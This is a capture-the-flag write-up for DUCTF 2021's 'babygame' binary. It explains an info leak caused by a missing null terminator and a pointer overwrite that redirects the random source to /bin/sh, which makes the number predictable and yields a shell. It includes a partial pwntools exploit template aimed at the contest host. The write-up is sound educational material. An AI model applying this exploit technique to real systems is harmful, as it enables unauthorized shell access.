# Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled
Solution
vuln 1
in game() function, it will ask us to provide number that is equals the first 4 bytes of /dev/urandom, if we guess it right, it will give us a shell. however guessing is not possible.
since NAME if 0x20 bytes long, so if we can write fill NAME with 0x20 bytes long, it will print out the next variable in the stack.
because if the entire buff is filled, the string will not terminate and continue reading until we get a null bytes.
and it set_name using strlen, so the total length would be 0x20+(length until it meet a null bytes)
1 2 3 4 5 6
// from print_username() puts(NAME);
// from set_username() uVar2 = strlen(NAME); fread(NAME, 1, uVar2, uVar1);
since the _RANDBUF is just beblow the NAME, we can first get the pointer of _RANDBUF and change the pointer in _RANDBUF to an known file, in this case we use /bin/sh
first write 32 bytes of name, than print name to get the pointer of _RANDBUF, after we got pointer of _RANDBUF we can use set_name to change this address to a existing /bin/sh string by offset.
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template '--host=pwn-2021.duc.tf' '--port=31907' babygame import os
from pwn import *
# Set up pwntools for the correct architecture exe = context.binary = ELF('babygame')
# Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or 'pwn-2021.duc.tf' port = int(args.PORT or 31907)
def start_remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = connect(host, port) if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals())
#=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled
with open("/bin/sh","rb") as f: a = f.read(4) print("num",int.from_bytes(a,"little"))